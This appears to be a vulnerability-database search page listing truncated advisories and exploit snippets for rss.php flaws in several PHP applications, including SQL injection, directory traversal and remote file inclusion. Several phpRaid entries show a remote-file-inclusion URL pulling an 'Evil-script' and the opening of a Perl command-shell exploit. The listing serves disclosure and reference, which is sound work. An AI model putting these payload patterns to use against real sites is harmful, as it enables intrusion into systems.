80 matches found
Fuzzylime CMS 3.01 - Remote Command Execution
Fuzzylime CMS 3.01 - Remote Command Execution !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in...
fuzzylime cms 3.01 Remote Command Execution Exploit
No description provided by source. !/usr/bin/perl fuzzylime 3.0.1 Perl exploit discovered & written by Ams [email protected] DESCRIPTION: There are availability to load files through script rss.php, and also there are unfiltered extract; usage. This exploit creates shell in...
Directory traversal
Multiple directory traversal vulnerabilities in OtomiGenX 2.2 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the lang parameter to (1) library_rss.php and (2) rss.php...
CVE-2008-2782
CVE-2008-2782 affects OtomiGenX 2.2. The vulnerability is a directory-traversal flaw in the PHP components library_rss.php and rss.php that allows remote attackers to include and execute arbitrary local files by supplying a .. (dot dot) in the lang parameter. This aligns with the NVD entry (CVSSv...
PT-2008-2120 · WordPress · Gallery
Name of the Vulnerable Software and Affected Versions: fGallery plugin for WordPress version 2.4.1 Description: The issue allows remote attackers to execute arbitrary SQL commands. This is achieved via the album parameter in the fim_rss.php file. Recommendations: For version 2.4.1, consider...
CVE-2007-6666
SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter...
SQL injection
SQL injection vulnerability in rss.php in Zenphoto 1.1 through 1.1.3 allows remote attackers to execute arbitrary SQL commands via the albumnr parameter...
Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit
No description provided by source. !/usr/bin/perl -w Zenphoto 1.1.3 SQL Injection Exploit Discovered by:...
PHPRaid RSS.PHP Remote File Inclusion Vulnerability
!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...
phpraid-rfi.txt
!/usr/bin/perl phpraid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv = $ARGV2; if$Path!/http:/// || $Pathtocmd!/http:/// || !$cmdvusage head; while print "shell $"; while $cmd=$;...
phpRaid < 3.0.7 (rss.php phpraid_dir) Remote File Inclusion Exploit
Exploit for unknown platform in category web applications =================================================================== phpRaid cmd shell example: Exploit : http://www.example.com/phpRaidpath/rss.php?phpraiddir=Evil-script? use LWP::UserAgent; $Path = $ARGV0; $Pathtocmd = $ARGV1; $cmdv =...
Article Script <= 1.6.3 (rss.php) Remote SQL Injection Vulnerability
No description provided by source. Article Script v1.and v1.6.3 Sql injection Script Name :Article Script Home Page:www.articlescript.org Bug Founder :Liz0ziM Mail:[email protected] Who's the daddy? Liz0ziM, of course ------------------------------------------------------------...
Article Script 1.6.3 - rss.php SQL Injection
Article Script 1.6.3 - rss.php SQL Injection Article Script v1.and v1.6.3 Sql injection Script Name :Article Script Home Page:www.articlescript.org Bug Founder :Liz0ziM Mail:[email protected] Who's the daddy? Liz0ziM, of course ------------------------------------------------------------...
Bloq 0.5.4 - rss.php?page[path] Remote File Inclusion
Bloq 0.5.4 - rss.php?page[path] Remote File Inclusion source: https://www.securityfocus.com/bid/20512/info Bloq is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues could allow an attacker to compromise the...
mospray.txt
Kurdish Security MoSpray Remote File Include Vulnerability Original Advisory : http://kurdishsecurity.blogspot.com/2006/07/kurdish-security-14-mospray-basedir.html Freedom For Ocalan Contact : irc.gigachat.net kurdhack & www.PatrioticHackers.com Risk : High Class : Remote Script : MoSpray Site :...
CVE-2006-3317
PHP remote file inclusion vulnerability in phpRaid 3.0.6 allows remote attackers to execute arbitrary code via a URL in the phpraid_dir parameter to (1) announcements.php and (2) rss.php, a different set of vectors and affected versions than CVE-2006-3316 and CVE-2006-3116...
SQL injection
SQL injection vulnerability in rss.php in MyBB (aka MyBulletinBoard) 1.1.1 allows remote attackers to execute arbitrary SQL commands via the comma parameter. NOTE: it is not clear from the original report how this attack can succeed, since the demonstration URL uses a variable that is overwritten...
CVE-2006-1956
The CVE-2006-1956 vulnerability affects the com_rss option (rss.php) in Mambo and Joomla!, where an invalid feed parameter can cause an error message that reveals the server path, enabling information disclosure. The primary sources document the affected components and the impact as partial confi...
SQL injection
SQL injection vulnerability in rss.php in RedBLoG 0.5 allows remote attackers to execute arbitrary SQL commands via the cat_id parameter...
CVE-2006-1140
The CVE describes a SQL injection in RedBLoG 0.5’s rss.php, exploitable via the cat_id parameter to allow remote execution of arbitrary SQL commands. Affected software: RedBLoG 0.5; vulnerability cause: unsanitized input leading to SQL injection. Impact per NVD: Partial confidentiality/integrity/...